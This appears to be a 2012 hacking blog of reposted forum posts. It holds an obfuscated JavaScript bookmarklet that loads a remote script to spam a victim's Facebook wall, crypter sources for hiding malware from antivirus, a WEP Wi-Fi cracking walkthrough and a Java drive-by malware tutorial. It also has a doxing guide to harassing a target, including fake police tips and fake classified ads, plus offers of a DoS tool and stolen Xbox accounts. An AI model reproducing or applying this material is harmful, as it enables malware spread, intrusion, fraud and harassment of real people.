Friday, 30 March 2012

I have a working script which I would like to share, It floods victims Facebook wall.

Works in Google Chrome, Mozilla, IE and more.


javascript:eval(String.fromCharCode(106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 58, 40, 97, 32, 61, 32, 40, 98, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 41, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 34, 115, 99, 114, 105, 112, 116, 34, 41, 41, 46, 115, 114, 99, 32, 61, 32, 34, 47, 47, 98, 105, 116, 46, 108, 121, 47, 101, 78, 53, 113, 87, 97, 34, 44, 32, 98, 46, 98, 111, 100, 121, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 97, 41, 59, 32, 118, 111, 105, 100, 40, 48, 41))

Hope you like it, this is my first post.

Screen Shot

[Image: 1.jpg]

[Image: 21.jpg]

Sec_rity is Incomplete without 'U'
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Hi there fellow members.
I decided to give-away an important tool that we all need.
I'm going to release 40+ some private crypter sources!

  • Added 10 more sources.
  • Added 4 C++ Sources. (Making a total of 45 sources)
  • Added coding language info.

But first of all, as always, there will be RULES.

You MUST read them first.


- Don't change the GUI and claim you made it.
- If you're thinking on trying to make your own crypter you may take bits from the codes, but if you do so you'll never become a coder, therefore the crypter wasn't "coded" by you;
- If you think on creating a crypter, be sure to credit the original coders.
- DO NOTdownload and not post after/before.

Now back to bussiness.

Now the links.
Note that I'm not responsible for w/e you do with the sources posted bellow, they are ment for learning only porpuses.

They aren't by order of awesomness nor alphabetical.
(I think most of them are public, but never know).

[Image: sources.png]

1st. ShadeHacK. VB6
Mediafire link

2nd. Snoopy_Downloader.
Mediafire link

3rd. Source CS 1. VB6
Mediafire link

4th. SpyNet Unpacked.
Mediafire link

[color=#00BFFF][b]5th. Source Undetector 2.52.
Mediafire link

6th. SU v1.1. VB6
Mediafire link

7th. Super Stealer. VB6
Mediafire link

8th. TCrypter. VB6
Mediafire link

9th. White-Crypt. VB6
Mediafire link

10th. Oikjn Crypter Source. VB6
Mediafire link

11th. OhShin.
Mediafire link

Mediafire link

13th. MyCrypt3r VB6]
Mediafire link

14th. MiniCrypt.
Mediafire link

15th. James's Crypter 2.
Mediafire link

16th. Infinity.
Mediafire link

17th. Indetectables Crypter. VB6
Mediafire link

18th. Hao Crypter. VB6
Mediafire link

19th. spam Crypter V .4. VB6
Mediafire link

20th. Goku Simple Crypter 0.5. VB6
Mediafire link

21st. GioCrypter. VB6
Mediafire link

22nd. FuKrypt_4. VB6
Mediafire link

23rd. FlyBy Crypter. VB6
Mediafire link

24th. FireCrypter.
Mediafire link

25th. Crypter Very. VB6
Mediafire link

26th. BIODOX. VB6
Mediafire link

27th. P-Obfuscator. VB6
Mediafire link

28th. Polifemo Ebrio Crypter. VB6
Mediafire link

29th. Incrypter Private Source. VB6
Mediafire link

30th. SkuLLByte Crypt [SRC][VB]. VB6
Mediafire link

31st. LC Down.
Mediafire link

32nd. Coding Nation Crypter. VB6
Mediafire link

33rd. Carbon Crypter. VB6
Mediafire link

34th. Fly Crypter v2d + USG 0.3. VB6
Mediafire link

35th. Op3nSrc CrYpt3r. VB6
Mediafire link

36th. RunTime Crypter skyweb007. VB6
Mediafire link

37th. ProCrypter - Stubgen. VB6
Mediafire link

38th. Shadow Crypter Private Version. VB6
Mediafire link

39th. PrjCone BETA. VB6
Mediafire link

40th. Mudkip. VB6
Mediafire link

41st. Extra-Element Crypter. VB6
Mediafire link

42nd. =8-D Crypter. C++
Mediafire link

43rd. Cryptic3. C++
Mediafire link

44th. (Doesn't Have a Name) Doesn't use PE, and I think it's unfinished. C++
Mediafire link

45th. uNKrypt0. C++
Mediafire link

Hope you enjoy this.

#1 Rule, DON'T claim the source is yours.

Also, I'm not responsible for w/e you do with this sources. And I'm not responsible if any of those sources contains an infected file. So don't run anything. Just open the sources.

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Tuesday, 27 March 2012


Things you will need :-

1. Miranda IM
2. Facebook Account

Now Just Follow the instructions...

1. Download Miranda from the link I gave before and run it.

2. After installing Open Accounts from Menu.

3. Click the [+] button as shown in the picture.
[Image: 54993129.png]

4. Now, In "Enter Account Name" fill your "Desired Name" OR "Facebook"
and Select "Jabber" Protocol and click OK as shown in the pic.
[Image: 31521557.png]

5. After that Double Click the Username OR the name you used Before as shown...

[Image: 61078036.png]

6. Then put your facebook username & password as shown in the pic...

[Image: 94256531.png]

7. Now go to this link and download the file.

8. Extract that file to anywhere and copy all the contents from the file and paste it to
Quote:C:\Program Files\Miranda IM\Plugins\


Where you installed Miranda IM

9. Now all you need to do is Run Miranda IM..!! Enjoy..! Victoire Thumbsup Superman Yeye


~You can edit options in Menu>Options>Plugins>Alicebot .

~You can also download more Plugins at This Link .
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Many Windows users here are struggling to hack WiFi networks because most of the tutorials are based on BackTrack and other Linux Tools .

Im just sharing the method to Crack WiFi networks using WEP security protocol . The WEP is a very vuarable to attacks and can be cracked
easily .
It takes about 5-6 hours if the password is weak a high signal of the WiFi network you are going to hack and you have sometimes 10-12 for more complicated passwords and if the WiFi signal of the Network is weak .
The time taken also changes if the WiFi network you are going to hack has many other clients already accessing it .

You will be using two tools .
1.Commview for WiFi :
You will use this tool for capturing the packets sent and recieved through the Access Point you are going to hack .
The more packets you capture the better chances of cracking the password .
You will need more than 1,00,000 minium packets to crack the password .
The packets will be captured in the .ncp format .
You will use this tool to convert the .ncp to .cap .

NOTE : Some WiFi cards are supported by Commview only in Windows 7 so i suggest you install Win 7 in ur Virtual Machine if ur card isnt supported .

2.Aircrack-Ng GUI :
You will use this tool to crack the password of the Access Point using the .cap files you obtained from the Commview application .

NOTE : You need to run this as administrator .

I have provided links for both the software below .

Download Links :

These are the links to the official website of the tools .
Some Anti Viruses might detect Aircrack as a virus . It is a false positive .

1.Aircrack-NG GUI

Get it from here :

2.Commview for Wifi

Get it from here :


STEP 1 :
1.Install CommView for WiFi . It doesnt matter whether you install it in VoIP mode or Standard mode . I used VoIP .
It automatically installs the necessary drivers . Allow it to install .

NOTE : You will not be able to connect to any Network using WiFi when using CommView .

STEP 2 :
2.Click on the PLAY ICON in the Left First .

[Image: 1hjh.png]

STEP 3 (Choosing the Network (a) ) :
A new window should pop up now .
Click on the START SCANNING button .
[Image: 2tit.png]

STEP 4 (Choosing the Network (b) ) :
Click on the WiFi network you want to hack in the Right Coulumn and Click on CAPTURE.
NOTE : This tutorial is only for WEP protected networks .

[Image: 3.png]

STEP 5 (Capturing the Packets) :
The windows should close now and you should see that CommView has started Capturing Packets .

[Image: 4.png]

STEP 6 (Saving the Packets ) :
Now that the Packets are getting captured you need to Save them.
Click on Settings->Options->Memory Usage
Change Maximum Packets in buffer to 20000
[Image: 9gyg.png]

Click on the LOGGING Tab .
In the Maximum Directory Size : 2000
Average Log File Size : 20

[Image: 7.png]
Now CommView will automatically Start Saving packets in the .ncp format at a size of 20MB each in the specified directory .

STEP 7 ( Concatenating the Logs ) :
Since you are capturing a lot of logs you will need to concatenate them into once file .
To do this go to Logging and click on CONCATENATE LOGS
Choose all the files that have been saved in your specified folder and Concatenate them .

Now you will have one .ncf file .

STEP 8 (Converting .ncf to .cap ) :
Now that you have one file with all the packets you need to Convert it into .cap file for AIRCRACK to crack .
Click on File->Log Viewer->Load Commview Logs-> Choose the .ncf file
Now File->Export->Wireshark/TCP dump format .


Aircrack Part :

Now for the Second Part Cracking this is very simple .

Just open the Aircrack Folder->Bin->Aircrack-ng GUI.exe

Choose the .cap file and you should be able to do the others .

If you have any questions or having problems post a thread il reply .

This is a simple tutorial . There is more advance using the rules and stuff but I havnt used it yet . This worked for me . Hope you found it useful .

Took a lot of time . Please leave your feedback.
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CityVille Hack [Latest]

CityVille Cheats

The latest version of CityVille Hack, which contains absolutely all our CityVille Cheats, just became the most popular hack of all our facebook hacks, which we have published here on our website! CityVille Hack has been already downloaded thousands of times and downloads number is growing daily. We received hundreds of positive feedback, this helps us a lot, thanks for all of you. Right now, our cityville cheats covers more than 30 different features and each of them saves you tons of your free time. We cannot name all the features of these cheats, but the main ones are these: coins generator and exp increaser. So, if you prefer playing games in a little bit unfairly way sometimes, than you definitely need to try our cityville cheats, or else you could go back and watch how other players succeed, while you are not. By the way, zynga makes changes to their algorithm quite often, so to keep this cityville hack working, we updating it quite often too. To be successful with this hack, all you have to worry about is if you are using the latest version of it. Whenever new version is available, you will see it on the main screen of cityville hack!

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Download WolfTeam [Free]

Download Wolfteam Aeria Games WolfTeam game produced by the firm, an online FPS First Person Shooting oyunudur.FPS ie, the meaning of guns in the hands of your eye you akmakta.Ve karşınızdakilere shooting at you olduğunuzdur.Yani shooter game, multiplayer game oynamaktasınız.Ücretsiz the wolf as the person who fired gun for those who want to play online games in a beautiful tercih.Ülkemizde team Joygame üstlenmiştir.Wolfteam mission to spread the game of Turkish users online, forums, and with the announcements, membership to play online with players amaçlıyor.Oyunu need to stand in contact with the membership, develop, and after being a member working.

 Wolfteam in the Game: The Future of wolves on the DNA of human DNA by some scientists that the installation is done and half wolf, half-human mutants çıkıyor.Pfien against a group of companies in this situation, "Epoxy" by developing a drug called trying to turn the situation to normal. But while the "Anti-Epoxy," named drug to produce an army full of men in the French army by selling wolf gives Francophones. French army Wolfteam using this medication, ie "Wolf Team" called creating an invincible army.
But anyone who uses the French plan against them, including processing Wolfteam başladı.Anti-Epoxy control output and on its own after a while the French are trying to invade the world into an independent army geldi.WolfTeam Wolves team that is now broken with the army and commanded them to survive as mercenaries began . now knows that the pursuit of the French army to resist and fight against them is dealing with Wolf Team.
Wolfteam game with guns: guns in the game of astonishing diversity cinsten.Ve that match each user must own a weapon of weapons bulabilecek.Bu automatic weapons, sniper, grenades and explosives placed mümkün.Tavsiye do not find a hack for guns and similar programs, but some sites are shared . to be able to actively Joy Money We recommend that you use premium features of the game except ediyoruz.Bunun find wolfteam game cheats, and forums like shares.

Wolfteam game, online games edinmiştir.Özellikle a place for himself among the very high quality MMO games everyone likes to spend hours at this game this game is tastefully oynamaktadır.Oyuncular, forums, images of war games in terms of shares and the effects carefully monitored etmektedirler.Oynanış aratmayan has the atmosphere of a game. You can find related to the shares SMF Wolfteam: Wolfteam forums

Wolfteam screenshot System requirements for those who want to download wolfteam
  • Processor: 1.4 Ghz
  • Operating System: Windows 98/XP/Vista
  • RAM: 512 MB
  • Hard Drive Space: 470 Mb
  • Graphics Card: GeForce 500
  • Keyboard and Mouse
  • Internet Connection
  • Direct X: 8 or more
download game CLICK BUTTON TO DOWNLOAD Wolfteam

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Sunday, 25 March 2012

Scaring the living shit out of your slave :

1. Turn volume to 100%,and open this website (If the slave has a cam,be sure to watch them!) :

2. Disable the keybord,and give your slave a error like:
Cannot find a valid keybord driver,press F5 to restore.

3. Photoshop some of there photo's,so that are hidden ghost's or monsters in the background,put one of the photo's as background picture.

4. Download the sound of THIS movie,with a site like THIS , and play it at there Computer when they are doing homework or watching porn,etc etc.

Other/Misc pranks :

1. save THIS picture as there background.

2. Upload .txt files with funny text's like 'The akward moment when a computer hacker is uploading TXT files to your desktop' or something similair to that.

3 Make a screenshot of there background with icons etc,save it as background picture,and remove the startbutton,taskbar,and shortcuts/desktop icons.

4. A oldschool Saxroll or rickroll is awesome!
Try .

More will come soon!
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[tut] 3DS Hacked

Nintendo 3DS hacked mods site

where Nintendo 3ds hacks get published

3DS Flash Card rom hackedWhat Should be Expected from the Flash Card of the Nintendo 3DS?
Nintendo NDS, DS Lite and even DSi consoles were hacked within weeks after their release, but 3DS may not be so easy to crack as Nintendo is taking some more serious percussions this time - or that is what they claim to be doing. The most appropriate Flash Card for hacking the 3DS regardless if that would be the R3D Gold, the SuperCard DSTREE, the AceKard 3DS, or the R4 3DS, aside from allowing you to play the 3DS roms - copies that are said to be backup copies of the games for the Nintendo 3DS will also have to be equipped with backward compatible cartridge with those of the NDS, the XL, as well as for the DS Lite and the DSi. Through this blank 3DS cartridge, it will now be possible for players to play downloaded games, run any homebrewed applications, and even play any media file straight from the game card’s Slot-1 on the Nintendo 3DS.
R4 Hacked 3DS

Buy R4 3DS Flash Card and Jailbreak Your N3DS »

N3DS Game Downloads

3DS Games Download and play on Your portable 3D console - 3DS Emulator Download - PC Emulator - 3DS Cart
With use of updates through the Wi-Fi, the 3DS games as well as the Ware titles for the 3DS will have full compatibility and alongside this will allow backward compatibility with the NDS roms as well as with the DSiWare. This will also help players get updates for games and the database for the cheat codes.R4 3DS N3 card
3DS Emulator No$GBA, No$NDS and 3DSemu. Disney 3DS films and latest blockbuster 3DS Movie straight from the theaters but without the need to wear the silly glasses.
The game Nintendogs+cats have definitely captured the hearts of players because of the cute beagle that can be adopted. When you play with the Frisbee, it would seem as if it pops out of the screen and will be held by your canine friend, and aside from that, it almost looks possible for you to feel the paw of the dog that you are playing with.

Subscribe to us for Latest 3ds Hack and Tricks comming soon.....
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Thursday, 22 March 2012


I will show you, step by step, how I plan to do this.
"It is safe to use, I use it myself".

First, you will need to go to this page, scroll down,
and under "Installation" download this.
^ click to go to the download page.

Once that is done, you will open up the program.
And you will click on the button at the top of the program
that says "Fusker Gen." This is a preview of that button:
[Image: suydls.png]

Now that you are on the Fusker Generator page, you will see an
address bar such as one you would see on Internet explorer.
The only difference is it says "Target Directory" instead. This is
where you will type the username of the photobucket you feel the
need to hack, for whatever weird reason you may have. :)
Once you have typed it in, click start.

When you have clicked start, the photos should automatically start
showing up in the "results" box to the right. Like this:
[Image: 2safsqq.jpg]

Thanks for reading my post,and let me know if you know of
any other or more effective ways to view a private photobucket.
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Tuesday, 20 March 2012

Thanks for taking the time to read this thread
It is important for beginners to take one subject at a time and stick with it until they master it so that is why the links are individual.

Here are some of the most common hacking methods,

Please post and enjoy

-Intro to hacking[/color]:

-Prevention and security:

-Trojans and Backdoors:


-Website hacking (SQLi and XSS)

-Wireless Hacking (through internet):


-Laws on hacking:

-Password cracking:

-Hacking e-mails

-Making viruses:


-Reverse engineering
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Monday, 19 March 2012

[TUT]How to make a Java Drive By

For this method, we will be doing a simple page rip, and adding one line of HTML code that will automatically download your Virus, and in hiden mode. So let's start off by downloading the contents:

Step One

Download the package, I will go further in detail about the files later:

Step Two

Now, open Index.html in notepad, and search for this:


Now, you must replace that link, to a Direct Download of your virus.

Q: What is a direct download?
A: A direct download is a URL, once entered, it will automatically start downloading the file, without making you click "Download" buttons, etc.

Q: How do I do a Direct Download?
A: Here is one way I do it, use use the Public Folder, and those are direct download links right there. :)

Step Three

Okay so you need a direct link, sign up at Once you are logged in, go to your Public folder. Simply click "Upload", and upload your virus to the Public folder. Once your virus is uploaded, right click the arrow, and click "Copy Public Link".

BIG IMAGE (Click to Hide)
[Image: pic1.jpg]

Now, the link you get, is the link you replace where it says:


Save that file, get ready for upload. :)

Step Four

Okay so now you need a place to upload your files! Your going to use File Ave. Once you are logged in, click Upload, and choose the 2 files I gave you:
  • Java.JAR
  • Index.html

Make sure those 2 files are in there, and once your done, your ready to spread.

Step Five(*Optional*)

Now, to conceal the stealthy download, you will need to have a less suspicious, or more believable, URL. You can do that using the DOT.TK services.

Simply get the file ave link that is your virus, and place it in the test box. Click go, and you will be redirected to a page with more advanced features. You will choose a name, now depending on what your spreading method is, what the name will be. So in this case, I used a RuneScape site clone. I will most likely use a link such as:


BIG IMAGE (Click to Hide)
[Image: pic2.jpg]

It's only minor social engineering.

Tips & Tricks

- I recommend that the file you upload, is FUD.

Q: What is FUD?
A: FUD is a slang term for "Fully Un-detectable". As in, not picked up by anti-virus's. If your file is FUD, you have a better chance of pulling off the infection, if it's not, the slave's anti-virus might block it most likely. if it's not FUD, get a crypter. You can find tons in the market place here, in Hack Forums!

- Try not to upload to Drop Box, ONLY if you don't have your own hosting!

Q: What do you mean our own hosting?
A: The reason I say that is because Drop Box has been known to scan virus's of they're member's files, and will remove them and report them to the people who make anti-virus's. I recommend buying your own Web Host, get one at ! You can just upload your .EXE virus and get a direct link from there.

- Mess around with the Index.html once you get better!

Q: What do you mean?
A: I mean, once you get good enough, you can start ripping your own pages and making them a JDB. I can teach you how to rip a site in an other tutorial, which I will be making and adding to this thread soon. It's simply copying a site's source code for the Index.html, and adding one line of code, which will be downloading you virus.
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Saturday, 17 March 2012

[TUT] Ruin somebody's life with DOX [TUT]

Box Floods

All you need is an address and an online postal account. Within a week or two, your slave will receive thousands upon thousands of boxes. They will litter his front yard and piss off neighbors. He won't be able to get rid of them easily without dealing with the post office, and they will probably call the cops on the slave for mail fraud.

Step 1: Create an account on using a valid email. or can be used for this. It provides e-mail addresses without the need to sign up.
Step 2: Go to USPS's store and order all the FREE boxes and mailing envelopes. Protip: order many small packs rather than fewer large packs (e.g. packs of 10 instead of packs of 25)
Step 3: Confirm the address and purchase.

You can order up to 20 free packs on a single account. So if you're not fucking retarded, you can see that one account can be used to send 600 boxes. Multiple accounts are no trouble at all, so make sure to send a few thousand.

That's it. Easy and bound to cause the slave lots of headaches.

Fast Food Bomb

Fast Food Bombing (notably pizza) is a lulzy way of causing grief for your target, all from the comfort of your Mom's basement. Fast food bombing consists of sending copious amounts of fast food to a target. The food is delivered to the target's place of residence or business, where they will have to deal with a delivery order of 4 large pepperonis and a side of Coke and garlic bread.

PROTIP: Some companies will not allow you to send too much to one place at any given time. Therefore, only send a typical amount of food. Also, don't send food first thing in the morning, as that is too suspicious.

PROTIP: If there are several fast food companies near your target, have each bring a few pizzas.

Ordering by phone

See Prank calls for tips on how to stay anonymous and not get angry fast food companies coming after you.

Ordering over the Internet

Potentially the lulziest method, also the easiest.


Pizza Hut

Junk Mail

Everybody hates junk mail. Spread it. You'll have to be a little creative with this, though. A lot of websites and newsletters now make you confirm your address before sending thousands upon thousands of emails. So if your slave is in control of the email still, to start receiving the junk you send to him he'll probably have to confirm it. There are still some websites who send out junk mail without confirmation:

Spam Links:
Order shit for them:

But there is always the option of signing them up for [gay] porn sites/newsletters, since everyone in porn is a greedy motherfucker and would sell your email address to spammers if they got their smutty hands on it.

Even more points if you sign him up for a shit load of IRL newsletters (preferably gay porn).

IRL Mail

Gore Mail: Simple enough; just send pages of gore to your enemy through the mail. Make sure to vary the hand writing on the envelopes and the return address so they all look different, otherwise the target will just throw them away. A good tactic is to make the envelopes look official with the logos and such of your victims local council/government/tax office/police station.

SRS BZNS Mail: Make up some legit looking envelopes and letterheads. Send your slave letters of repossession, traffic fines, hearings about suspected income tax fraud, or send them to court. Be creative.

USPS Redirect: Goto a post office, say you are moving, or you are new to the area and need to redirect your mail temporally. They will give you an envelope/postcard to fill out and drop in any mailbox. To the best I know, there is no checking done on the part of the USPS. Redirect mail from P.O. Boxes and rural and carrier routes as well.

Business reply mail: This type of mail is similar to the above methods, except requires templates that conform to that postage systems standards. This type of mail as opposed to regular mail is good because:

It can be sent without a return address (nobody questions it.)
All the cost goes to the person it is being sent to (send them lead weights if you want.)
It looks srs.


If the target has a sense of humor, these are just about as annoying as anything else you could sign them up for. However, if the target is lacking in the humor department, this is quite possibly the best weapon we have at our disposal other than gay porn.


Craigslist has the ability to really fuck up someone's life. Every day thousands of people visit Craigslist to check classified ads. Can you see where we're going with this?

Craigslist is the obvious choice but don't forget that Myspace has a classified ads section as well.

Epic Idea #1: Post that "you" are having a garage sale. You are moving and everything needs to go. You'll have an HDTV there for $50, a stereo set for $100 and many other cheap ass high-end things. Steal pictures off the internet of "your items" for lulz. Enter your slave's address, and choose a date over the weekend. On those days your slave will have strangers coming to his house constantly asking for cheap stuff. Sometimes even the POLICE get involved. Why? Police track down thefts. If your slave is selling a bunch of high-end merchandise, it's likely the police will check it out.

Epic Idea #2: Post to Craigslist that you are selling "your" car. Make it cheap, something like a 1999 Ford F-250 for $2000 because it needs a new paintjob or something. Make sure to post "your" phone number! Be creative!

Epic Idea #3: Post a personal ad that conflicts with "your" sexual identity. Normally, this is best done by posting in the men seeking men section. You need to write an ad that is both believable and hawt so people will reply to it. Steal some pictures of "yourself" and "your" dick because ads with dick pics get more replies. Post "your" phone number and make sure you say in your ad how urgently you need to get laid. Soon enough "you" will have half the leather daddies in town calling "you" up. If you add that "you" are currently still in the closet and that denying that "you" are gay really means there are people around who "you" haven't come out to yet then you can get your unwitting partners in harassment to keep coming back to bother the mark waiting for them to be alone, if the goddess of lulz is on your side this could even produce an argument between the person responding to "your" personal ad and the mark's friends and or family about tolerance towards the marks true sexuality.

Epic Idea #4: Your own idea.

Traditional Classifieds

Almost every newspaper out there lets you call in the ad you want to have in the paper and then they send you a bill for it. In other words, it's free. Look in your local paper and judging from the ads that are in there, think up something that would be a really hot item to sell such as a house for rent. (Houses and cars usually get the best results.)

Call the paper and tell them that you're Robert Paulson and you want to put an ad in the paper. Have something ready like, "Nice 3 bedroom, 2 bath, garage, den, dining room, great neighborhood, $300/month, $200/deposit." Compare your ad to the others in the "For Rent" section and be sure that yours is the very best deal in there.

As a phone number to call to inquire about the house, leave two. "Call Robert Paulson anytime 24 hrs at 635-8312 or 635-9207." The first being his work phone number and the second being his home. Now when an awesome deal like you've put in the paper is seen, it gets a tremendous response. I'm talkin' about his telephone ringing constantly for two days straight at the least.

He'll get in big trouble with his boss at work for receiving 2 billion calls. Even if he's able to convince his boss that he wasn't responsible, he'll still look bad. I mean, what would your boss think about all this happening? If he lives with his parents, he'll probably get in trouble with them too.

You may want to consider translating your ad into another language and contacting a foreign language newspaper. In some areas there may be a local paper in, for example, the Russian language. The slave will get phone calls from people who may not speak fluent English, causing them to argue in vain with someone unable to understand them.

Personal Ads

There are a lot of fucked up lonely people out there. Sign your slave up to internet dating sites, and make sure you post your slave's information publicly. He will have calls and random people coming up to his house - possibly even rapists or thieves.

Craigslist has a Personal Ads section. Have fun with it.

Public Toilet Personal Ads

If you have the targets mobile phone number, write in on the wall of a public toilet in a message similar to this "Hi, Im [name], [age], 11 inch uncut, seeking mature males for good time. Call: 04XX XXX XXX". Extra points if you do this to toilets that are known for gay soliciting.

Magazine Subscriptions

This one is pretty simple and even normal people do it to prank friends. Magazine subscriptions are easy to get, and paying for them requires no credit card - just the person's address.

Step 1: Go to a book store or any place that sells magazines. You may also have some magazines you've already purchased or have in your collection, you can use those too.
Step 2: Rip out all the "Subscription" note cards. They're those flimsy little square pieces of paper that fall onto the floor when you are trying to read your magazine.
Step 3: Fill out the "Subscription" note cards in ink with a different style of handwriting. Put your slave's address and name on them.
Step 4: Put them in your local mail collector box. All of them should have "Paid Postage" - no stamps needed.

TL;DR - Get subscription note cards, fill them out with slave's info, mail them to magazine company.

Yellow Pages

This is probably one of the best things to do and can even become a major news event in your area. You pull out the 'ole phone book and open it up to the yellow pages. Now, starting from the letter "A" and working all the way to "Z" call up every single business in the book. Set up an appointment with every company in there for (example) Wednesday morning at about 10:00. Give yourself a few days to do it all and get all the appointment as close together as you can.

You can probably see what's going to happen. Wednesday morning at 10:00 his street is going to be totally filled up with a truck from every business in the entire area. From exterminators to furnace repair to roofing estimates, they'll all be there asking for Chris. (Try to make sure he's going to be home when they come.)

On Wednesday morning you'll want to make some calls. At 9:30 call up every pizza delivery place in the area and have a couple large pizzas sent to Chris. After that, call up all the taxi cabs and instruct them to come to your house to take you shopping.

Tuesday night you'll also want to make some calls. Every T.V. station and newspaper in the area will want to know that "something big is going to happen on Sullivan street" in the morning. Don't tell them what, just tell them that they'd be stupid not to get coverage on something like this. Also call up all your friends and have them call up their friends. Instruct them all to show up on Sullivan street at about 9:45 am.

As this will be an historical moment, bring a video camera and tape the whole event just in case you're not happy with the camera work of the T.V. stations. You might want to call in a false report to the fire department that Chris's house is on fire just to get them there and add to the confusion.

Crime Tips

This is a bit harder to pull off with no guarantee of follow-through, but it can be a great way to ruin someone's life. There have been stories of police teams busting in and wrecking someone's place looking for a "lead" that was offered to them. Police often have really crappy judgment.

First find the local police station in your slave's town. Google some local news. Find some stories about hit and runs, or recent unsolved murders. Things that happened within the last two weeks. Call their police station and offer an Anonymous tip. There are many things you can tell the police. Such as "my friend has an unexplained dent in the front of his car" or "he's been really on edge lately telling me about something he did that was really, really bad. I want to get him help."

With any luck this can offer epic lulz, a totally ruined life, and a bunch of news coverage.

PROTIP: Police will often require more than one "informant" before they go to the hassle of obtaining a warrant, planning the raid, getting their overtime approved, etc. So work with someone on this, be sure not to give the same information word-for-word, as police may catch on.


For this you need to find more detailed information so they'll accept it and pay some ass-raping fees. Pretend to be a family member, and try to keep them on as long as possible (they'll probably hang up after 2 seconds flat, honestly, but if you're good...). Start a collect call. When the operator asks for your name, they'll be recording what you say so they can inject it into a pre-recorded sound byte that says something like "Will you accept a collect call from..." so you end up with "Will you accept this message from 'Fuck you, David'" or whatever other message you can fit into the short time they give you to say your name. Only useful for being annoying/making threats, doesn't accomplish anything else. If you're a British, the equivilant is 0800-REVERSE (0800 7383773).

Ruin a Marriage

Collect information about a married man that you know. Get a girl to call his house. If the wife answers, hang up. Do this another time. On the third time, ask for the guy. This will cause lots of suspicion. Keep this up for a month and see his marriage ruined. Also, send sexy gifts to his house, like used panties and love notes. Put in details about the guy so that the wife will think it's legit.

Purchase Orders

Corporations don't buy things by actually paying for them, they send out a PO, which is just a promise to pay later after the goods or services have been rendered. This is standard business practice.

Take an anonymous prepaid credit card
Buy an anonymous VoIP fax service
Obtain a professional looking form from a print shop
Fax POs through tor
Most companies will ship no questions asked after receiving a PO. Said companies will come after your target and sue them and ruin their credit, and they'll have fucking tons of shit that they don't know what to do with
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Friday, 16 March 2012


Powerfull New DoSer 74.7 Free & Downloadable!

{*} Differant Modes- UDP,TCP,SYN,PING!
{*} Port
{*} Threads
{*} Sockets
{*} Add Your Own Shells/use Public Shells
{*} Know your Own IP Address
{*} Take Down Websites & Home Connections

http://i55.www. t i n y p i c .com/i721xk.jpg

Post Below Saying If you Wont this, and i will PM you the LINK as soon as possible.

Once you recieve the DOWNLOAD in the comment here please come back to the topic and Post LEGIT!.. It will help me out
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Tuesday, 13 March 2012

I have a method of easily obtaining others XBL accounts. With this, you can sell them and make $$$$. If you'd like like to know my method and interested in using it, post here AND send me a Private Message!

(Note) I have over 400 good accounts from doing this.
I'm finally willing to spread my knowledge on this since I have already hacked all of the top dogs on xbox and already have a substantial amount of peoples account information.

[Image: AccountsForHF.jpg]

[Image: Picture20.png]

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So today I would like to share this tutorial on how to Successfully complete a survey and Download that file from anywhere around the world for FREE.

TO all coders, Programmers, contributors: who use $harecash links to earn for their hardwork: Next time you give out a spam link, you could add a link to this Thread, so that people can successfully download and you can earn some cash.

TO all Downloaders, newbies, leechers: Just follow the Tutorial and i am sure you can download the file successfully.

Ok so lets Jump on to the tutorial...

Things you need:

1. $harecash or anyother survey link ( Obviously Roflmao )
2. some way to change your ip to an US IP. (will discuss later)
3. Fake Name Generator.
4. A Google account.
5. And some patience.

Steps To Complete the Survey:
Step1: Changing your IP address into a US Ip address. To do this there are many methods but i will show you a 4 methods to Do this.

1. Using a Free VPN ( Virtual Private Network ) without any software installation.

Few of Free VPNs :

  • Best Free VPN [pptp server:]
  • Real-VPN [pptp server:] ( need to register to get login details )
  • USip ( Follow instructions on the Website )
Setting up VPN network:
- From Windows 7 Desktop, click Start - Control Panel to open the control panel;
- Click Network and Internet, click Network and Sharing Center;
- Click Set up a new connection or network, then Connect to a workplace;
- Select option No, create a new connection, then Use my Internet connection (VPN);
- In the Connect to a workplace window, fill fields as below:
[Image: windows-7-vpn-setup-guide.png]

- In Next window, use Username in User name field, and use password in the Password field, then click "Connect" button to start the free VPN connection! you have successfully changed to a US IP.
[Image: windows7-pptp-vpn-configuration.png]

2. Using a Free VPN ( Virtual Private Network ) with downloadable software installation.

Few of Free VPNs :
3. Using IP changing Softwares:
I use Real Hide Ip v4.1.1.6, it is fast and can be used to change ips to different countries.

screenshot: Real hide IP screenshot

Real Hide Ip v4.1.1.6 with Crack : Download Here
Virus Scan:

4. Manually change IP using Private Socks or Highly Anonymous proxies:

Things you need:
- Firefox browser
- FoxyProxy Addon or
- ProxyTool Addon [ You can add a List of Proxies at once in this Addon ]
- US Proxies

You can get Loads of Proxies daily updated in the HF Proxies n Socks Subforum. or from this site : Hide My ass
[ NOTE: Do not Use Proxies from CoDeeN CDN Network, most of the proxies with Port starting with 31 are CoDeeN proxies. you cannot complete surveys using this proxy ]
Just Use a US Proxy to change your IP into a US IP.

Step 2: Set up a Google Voice Account to get a Real US Phone Number.

First, you need to Generate a Fake Name and US Address.
you can Do that using or Using this application.

Fake Name Generator : Download here [ Credits: Nathan72389 ]
Virus Scan:

Setting up Google voice account:
- Check that you have a US ip before you further proceed. Check you IP here
- Go to this link: Google Voice
- Login with your Google Username and Password.
- Click on the "I want a New Number" button
- Enter a Zip code from the fake name generator, and press search. If it says no Numbers found, Use another zip.
[Image: g3.png]

- keep trying till you get a Phone number, like below. select a Number and Press Continue.
[Image: g4.png]

- Copy and Save this Number for Future Use.
[Image: g5.png]

[Note: you can further continue with the steps, you will be asked to enter your phone number to redirect all msg to your phone. by doing this you can keep this Google Phone number permanently for any further Use.]

Step 3: Lets Download This SHITcash Hehe

Now Go to the $harecash URL you want to download.
If you have a Mirror Link, like etc you can use this $harecash Reflector to convert it to the Orginal Link.

$harecash Reflector: Download here
Virus Scan:

-Click on a Survey which doesnt require you to confirm your Phone number.
Some of the Surveys which will work:
  • Who is better? mcdonalds or burger king , [Any survey related to fast food.]
  • Which simpson,southpark,familyguy character are you?
screenshot 1 (Click to Hide)
[Image: s1.png]

- Fill in all the details, and for the Phone number USE the Google Voice number you generated above.

screenshot 2 (Click to Hide)
[Image: s3.png]

- After Filling up the Details, go to the $harecash download Tab and WAIT.
- You need to Wait till the $harecash page automatically refreshes more than twice [ WAIT for atleast 5 MINS ]. You Should Successfully unlock your File. Yeye

screenshot 3 (Click to Hide)
[Image: s4.png]

If it still doesn't download Try another Survey with the SAME details.

